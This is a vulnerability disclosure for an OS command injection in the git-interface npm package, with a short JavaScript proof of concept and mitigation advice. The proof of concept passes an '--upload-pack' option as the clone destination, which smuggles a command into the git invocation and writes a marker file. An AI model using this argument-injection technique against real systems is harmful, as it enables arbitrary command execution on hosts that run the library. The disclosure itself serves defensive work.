# Command Injection vulnerability in git-interface@2.1.1
`git-interface` describes itself as a Interface to work with a git repository in node.js
Resources:
* Project’s GitHub source code: https://github.com/yarkeev/git-interface
* Project’s npm package: https://www.npmjs.com/package/git-interface
I’m reporting an OS Command Injection vulnerability in `git-interface` npm package. The API may be abused if user input is able to provide a valid directory on disk and supply the destination directory to clone a repository too.
## Proof of Concept exploit
Install `git-interface@2.1.1` which is the latest.
Run the following code, with the following precondition, in which the `/tmp/new` directory needs to exist (doesn’t need to be a .git initialized directory though), and so, you could provide a predictable path like say `/usr/src`:
“`js
const { Git } = require(‘git-interface’);
const git = new Git({
dir: ‘/tmp/new’ //default path is current directory
});
git.clone(‘file:///tmp/new’, ‘–upload-pack=echo>/tmp/pwned’);
“`
Observe a new file created: `/tmp/pwned`
# Mitigation suggestions
Use the shell `–` notation as a suffix of the supported command-line arguments (if at all), to then make sure that input passed to the git command is positional arguments rather than command-line arguments. For example: `git clone — ` would prevent path and destination from being interpreted as command-line arguments for the git command.
# Author
Liran Tal